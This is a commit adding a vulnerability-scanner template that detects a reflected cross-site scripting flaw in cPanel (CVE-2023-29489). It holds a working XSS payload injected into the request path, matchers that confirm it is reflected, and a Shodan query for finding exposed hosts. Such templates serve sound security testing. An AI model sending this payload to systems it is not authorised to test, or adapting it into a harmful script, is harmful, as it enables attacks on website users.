Create CVE-2023-29489.yaml

cves/2023/CVE-2023-29489.yaml

@@ -0,0 +1,29 @@
+id: CVE-2023-29489
+
+info:
+  name: cPanel - Cross-Site Scripting
+  author: DhiyaneshDk
+  severity: medium
+  reference: https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
+  metadata:
+    verified: "true"
+    shodan-query: title:"cPanel"
+  tags: cpanel,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
+          - 'Invalid webcall ID:'
+        condition: and
+
+      - type: status
+        status:
+          - 400